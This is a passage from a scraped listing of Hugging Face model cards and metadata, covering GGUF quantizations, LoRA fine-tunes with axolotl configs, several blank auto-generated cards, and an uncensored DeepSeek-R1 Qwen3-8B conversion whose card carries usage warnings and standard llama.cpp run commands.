- Tokenizers 0.21.1
|
mradermacher/Refact-1_6B-fim-GGUF | mradermacher | 2025-05-30T09:59:43Z | 35 | 0 | transformers | [
"transformers",
"gguf",
"code",
"en",
"dataset:bigcode/the-stack-dedup",
"dataset:rombodawg/2XUNCENSORED_MegaCodeTraining188k",
"dataset:bigcode/commitpackft",
"base_model:refactai/Refact-1_6B-fim",
"base_model:quantized:refactai/Refact-1_6B-fim",
"license:bigscience-openrail-m",
"endpoints_compatible",
"region:us"
] | null | 2025-03-11T02:23:57Z | ---
base_model: refactai/Refact-1_6B-fim
datasets:
- bigcode/the-stack-dedup
- rombodawg/2XUNCENSORED_MegaCodeTraining188k
- bigcode/commitpackft
language:
- en
library_name: transformers
license: bigscience-openrail-m
quantized_by: mradermacher
tags:
- code
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/refactai/Refact-1_6B-fim
<!-- provided-files -->
weighted/imatrix quants are available at https://huggingface.co/mradermacher/Refact-1_6B-fim-i1-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q2_K.gguf) | Q2_K | 0.7 | |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_S.gguf) | Q3_K_S | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_L.gguf) | Q3_K_L | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.IQ4_XS.gguf) | IQ4_XS | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q5_K_S.gguf) | Q5_K_S | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q5_K_M.gguf) | Q5_K_M | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q6_K.gguf) | Q6_K | 1.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q8_0.gguf) | Q8_0 | 1.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.f16.gguf) | f16 | 3.3 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
leobianco/npov_RM_google_S_130104_LLM_false_STRUCT_false_epochs_3_lr_1e-3_r_8_2505300948 | leobianco | 2025-05-30T09:54:12Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-05-30T09:48:56Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Sowkwndms/DeepSeek-R1-0528-Qwen3-8B-abliterated-Q5_K_M-GGUF | Sowkwndms | 2025-05-30T09:47:29Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"chat",
"abliterated",
"uncensored",
"llama-cpp",
"gguf-my-repo",
"base_model:huihui-ai/DeepSeek-R1-0528-Qwen3-8B-abliterated",
"base_model:quantized:huihui-ai/DeepSeek-R1-0528-Qwen3-8B-abliterated",
"license:mit",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-05-30T09:47:01Z | ---
license: mit
library_name: transformers
base_model: huihui-ai/DeepSeek-R1-0528-Qwen3-8B-abliterated
tags:
- chat
- abliterated
- uncensored
- llama-cpp
- gguf-my-repo
extra_gated_prompt: '**Usage Warnings**
“**Risk of Sensitive or Controversial Outputs**“: This model’s safety filtering
has been significantly reduced, potentially generating sensitive, controversial,
or inappropriate content. Users should exercise caution and rigorously review generated
outputs.
“**Not Suitable for All Audiences**:“ Due to limited content filtering, the model’s
outputs may be inappropriate for public settings, underage users, or applications
requiring high security.
“**Legal and Ethical Responsibilities**“: Users must ensure their usage complies
with local laws and ethical standards. Generated content may carry legal or ethical
risks, and users are solely responsible for any consequences.
“**Research and Experimental Use**“: It is recommended to use this model for research,
testing, or controlled environments, avoiding direct use in production or public-facing
commercial applications.
“**Monitoring and Review Recommendations**“: Users are strongly advised to monitor
model outputs in real-time and conduct manual reviews when necessary to prevent
the dissemination of inappropriate content.
“**No Default Safety Guarantees**“: Unlike standard models, this model has not undergone
rigorous safety optimization. huihui.ai bears no responsibility for any consequences
arising from its use.'
---
# Sowkwndms/DeepSeek-R1-0528-Qwen3-8B-abliterated-Q5_K_M-GGUF
This model was converted to GGUF format from [`huihui-ai/DeepSeek-R1-0528-Qwen3-8B-abliterated`](https://huggingface.co/huihui-ai/DeepSeek-R1-0528-Qwen3-8B-abliterated) using llama.cpp via the ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/huihui-ai/DeepSeek-R1-0528-Qwen3-8B-abliterated) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo Sowkwndms/DeepSeek-R1-0528-Qwen3-8B-abliterated-Q5_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-abliterated-q5_k_m.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo Sowkwndms/DeepSeek-R1-0528-Qwen3-8B-abliterated-Q5_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-abliterated-q5_k_m.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo Sowkwndms/DeepSeek-R1-0528-Qwen3-8B-abliterated-Q5_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-abliterated-q5_k_m.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo Sowkwndms/DeepSeek-R1-0528-Qwen3-8B-abliterated-Q5_K_M-GGUF --hf-file deepseek-r1-0528-qwen3-8b-abliterated-q5_k_m.gguf -c 2048
```
|
jinx2321/nllb-1e4-paper-distilled-4 | jinx2321 | 2025-05-30T09:39:23Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"m2m_100",
"text2text-generation",
"generated_from_trainer",
"base_model:jinx2321/nllb-1e4-paper",
"base_model:finetune:jinx2321/nllb-1e4-paper",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-05-30T06:57:35Z | ---
library_name: transformers
license: cc-by-nc-4.0
base_model: jinx2321/nllb-1e4-paper
tags:
- generated_from_trainer
model-index:
- name: nllb-1e4-paper-distilled-4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# nllb-1e4-paper-distilled-4
This model is a fine-tuned version of [jinx2321/nllb-1e4-paper](https://huggingface.co/jinx2321/nllb-1e4-paper) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0001
- train_batch_size: 128
- eval_batch_size: 8
- seed: 42
- optimizer: Use adamw_torch with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 3
### Training results
### Framework versions
- Transformers 4.52.0.dev0
- Pytorch 2.6.0+cu124
- Datasets 3.4.1
- Tokenizers 0.21.1
|
Varinder2110/c5349026-cea7-4722-ae62-a776554510f9 | Varinder2110 | 2025-05-30T09:35:21Z | 0 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2025-05-30T08:30:46Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: TOK
---
# C5349026 Cea7 4722 Ae62 A776554510F9
<Gallery />
## About this LoRA
This is a [LoRA](https://replicate.com/docs/guides/working-with-loras) for the FLUX.1-dev text-to-image model. It can be used with diffusers or ComfyUI.
It was trained on [Replicate](https://replicate.com/) using AI toolkit: https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `TOK` to trigger the image generation.
## Run this LoRA with an API using Replicate
```py
import replicate
input = {
"prompt": "TOK",
"lora_weights": "https://huggingface.co/Varinder2110/c5349026-cea7-4722-ae62-a776554510f9/resolve/main/lora.safetensors"
}
output = replicate.run(
"black-forest-labs/flux-dev-lora",
input=input
)
for index, item in enumerate(output):
with open(f"output_{index}.webp", "wb") as file:
file.write(item.read())
```
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('Varinder2110/c5349026-cea7-4722-ae62-a776554510f9', weight_name='lora.safetensors')
image = pipeline('TOK').images[0]
```
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
## Training details
- Steps: 6000
- Learning rate: 0.0004
- LoRA rank: 16
## Contribute your own examples
You can use the [community tab](https://huggingface.co/Varinder2110/c5349026-cea7-4722-ae62-a776554510f9/discussions) to add images that show off what you’ve made with this LoRA.
|
Hjjg2445/fukgybg | Hjjg2445 | 2025-05-30T09:32:21Z | 0 | 0 | null | [
"license:bigcode-openrail-m",
"region:us"
] | null | 2025-05-30T09:32:21Z | ---
license: bigcode-openrail-m
---
|
Tandogan/dpo_v3_alpaca_on_base_big | Tandogan | 2025-05-30T09:31:22Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"qwen3",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2025-05-30T09:30:18Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
dimasik87/bee073bf-1eec-4512-b15b-ea5e13c9d7f1 | dimasik87 | 2025-05-30T09:24:17Z | 0 | 0 | peft | [
"peft",
"safetensors",
"qwen2",
"axolotl",
"generated_from_trainer",
"base_model:unsloth/Qwen2-1.5B-Instruct",
"base_model:adapter:unsloth/Qwen2-1.5B-Instruct",
"license:apache-2.0",
"4-bit",
"bitsandbytes",
"region:us"
] | null | 2025-05-30T08:25:24Z | ---
library_name: peft
license: apache-2.0
base_model: unsloth/Qwen2-1.5B-Instruct
tags:
- axolotl
- generated_from_trainer
model-index:
- name: bee073bf-1eec-4512-b15b-ea5e13c9d7f1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
absolute_data_files: false
adapter: lora
base_model: unsloth/Qwen2-1.5B-Instruct
bf16: true
chat_template: llama3
dataset_prepared_path: /workspace/axolotl
datasets:
- data_files:
- 03542368294c05c0_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_instruction: instruct
field_output: output
format: '{instruction}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
dpo:
beta: 0.1
enabled: true
group_by_length: false
rank_loss: true
reference_model: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 1
flash_attention: true
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: true
gradient_clipping: 0.85
group_by_length: false
hub_model_id: dimasik87/bee073bf-1eec-4512-b15b-ea5e13c9d7f1
hub_repo: null
hub_strategy: end
hub_token: null
learning_rate: 1.0e-06
load_in_4bit: true
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 64
lora_dropout: 0.1
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 32
lora_target_linear: true
lr_scheduler: cosine
max_steps: 500
micro_batch_size: 6
mixed_precision: bf16
mlflow_experiment_name: /tmp/03542368294c05c0_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 2
optimizer: adamw_bnb_8bit
output_dir: miner_id_24
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 1
sequence_len: 1024
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: online
wandb_name: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef
wandb_project: s56-7
wandb_run: your_name
wandb_runid: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef
warmup_steps: 50
weight_decay: 0.05
xformers_attention: true
```
</details><br>
# bee073bf-1eec-4512-b15b-ea5e13c9d7f1
This model is a fine-tuned version of [unsloth/Qwen2-1.5B-Instruct](https://huggingface.co/unsloth/Qwen2-1.5B-Instruct) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 1.9160
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-06
- train_batch_size: 6
- eval_batch_size: 6
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 24
- optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 50
- training_steps: 500
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 1.9601 | 0.0000 | 1 | 1.9706 |
| 2.0692 | 0.0101 | 250 | 1.9317 |
| 1.9941 | 0.0203 | 500 | 1.9160 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1 |
dimasik2987/19d7a71a-8226-44a0-a662-51de454691c5 | dimasik2987 | 2025-05-30T09:20:13Z | 0 | 0 | peft | [
"peft",
"safetensors",
"qwen2",
"axolotl",
"generated_from_trainer",
"base_model:unsloth/Qwen2-1.5B-Instruct",
"base_model:adapter:unsloth/Qwen2-1.5B-Instruct",
"license:apache-2.0",
"4-bit",
"bitsandbytes",
"region:us"
] | null | 2025-05-30T08:25:24Z | ---
library_name: peft
license: apache-2.0
base_model: unsloth/Qwen2-1.5B-Instruct
tags:
- axolotl
- generated_from_trainer
model-index:
- name: 19d7a71a-8226-44a0-a662-51de454691c5
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
absolute_data_files: false
adapter: lora
base_model: unsloth/Qwen2-1.5B-Instruct
bf16: true
chat_template: llama3
dataset_prepared_path: /workspace/axolotl
datasets:
- data_files:
- 03542368294c05c0_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_instruction: instruct
field_output: output
format: '{instruction}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
dpo:
beta: 0.1
enabled: true
group_by_length: false
rank_loss: true
reference_model: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 1
flash_attention: true
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 2
gradient_checkpointing: true
gradient_clipping: 0.85
group_by_length: false
hub_model_id: dimasik2987/19d7a71a-8226-44a0-a662-51de454691c5
hub_repo: null
hub_strategy: end
hub_token: null
learning_rate: 5.0e-06
load_in_4bit: true
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 128
lora_dropout: 0.1
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 64
lora_target_linear: true
lr_scheduler: cosine
max_steps: 500
micro_batch_size: 12
mixed_precision: bf16
mlflow_experiment_name: /tmp/03542368294c05c0_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 2
optimizer: adamw_bnb_8bit
output_dir: miner_id_24
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 1
sequence_len: 1024
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: online
wandb_name: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef
wandb_project: s56-7
wandb_run: your_name
wandb_runid: 43e1f9fe-da21-41e2-ae9d-431b9ab608ef
warmup_steps: 50
weight_decay: 0.02
xformers_attention: true
```
</details><br>
# 19d7a71a-8226-44a0-a662-51de454691c5
This model is a fine-tuned version of [unsloth/Qwen2-1.5B-Instruct](https://huggingface.co/unsloth/Qwen2-1.5B-Instruct) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 1.6933
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-06
- train_batch_size: 12
- eval_batch_size: 12
- seed: 42
- gradient_accumulation_steps: 2
- total_train_batch_size: 24
- optimizer: Use OptimizerNames.ADAMW_BNB with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 50
- training_steps: 500
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 1.9603 | 0.0000 | 1 | 1.9165 |
| 1.8663 | 0.0101 | 250 | 1.7078 |
| 1.7963 | 0.0203 | 500 | 1.6933 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1 |
tunglouis/qlora_awq_wbit4_gs256 | tunglouis | 2025-05-30T09:19:03Z | 0 | 0 | null | [
"safetensors",
"llama",
"dataset:carlosejimenez/wikitext__wikitext-2-raw-v1",
"base_model:meta-llama/Llama-3.2-3B-Instruct",
"base_model:quantized:meta-llama/Llama-3.2-3B-Instruct",
"license:llama3.2",
"4-bit",
"awq",
"region:us"
] | null | 2025-05-30T09:13:27Z | ---
license: llama3.2
datasets:
- carlosejimenez/wikitext__wikitext-2-raw-v1
base_model:
- meta-llama/Llama-3.2-3B-Instruct
---
Edge AI Final Project - LLM Acceleration
Group8


|
MaestrAI/camelia_brightwood-lora-1748596570 | MaestrAI | 2025-05-30T09:16:11Z | 0 | 0 | null | [
"region:us"
] | null | 2025-05-30T09:16:10Z | # camelia_brightwood LORA Model
This is a LORA model for character Camelia Brightwood
Created at 2025-05-30 11:16:10
|
DatTran0509/Finetune_XLM_R_base_QA_NEW | DatTran0509 | 2025-05-30T09:15:47Z | 12 | 0 | transformers | [
"transformers",
"safetensors",
"xlm-roberta",
"question-answering",
"generated_from_trainer",
"base_model:FacebookAI/xlm-roberta-base",
"base_model:finetune:FacebookAI/xlm-roberta-base",
"license:mit",
"endpoints_compatible",
"region:us"
] | question-answering | 2025-05-29T19:59:22Z | ---
library_name: transformers
license: mit
base_model: FacebookAI/xlm-roberta-base
tags:
- generated_from_trainer
metrics:
- f1
model-index:
- name: Finetune_XLM_R_base_QA_NEW
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Finetune_XLM_R_base_QA_NEW
This model is a fine-tuned version of [FacebookAI/xlm-roberta-base](https://huggingface.co/FacebookAI/xlm-roberta-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 1.5708
- Exact: 65.6004
- F1: 74.4082
- Total: 3814
- Hasans Exact: 65.6004
- Hasans F1: 74.4082
- Hasans Total: 3814
- Best Exact: 65.6004
- Best Exact Thresh: 0.0
- Best F1: 74.4082
- Best F1 Thresh: 0.0
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
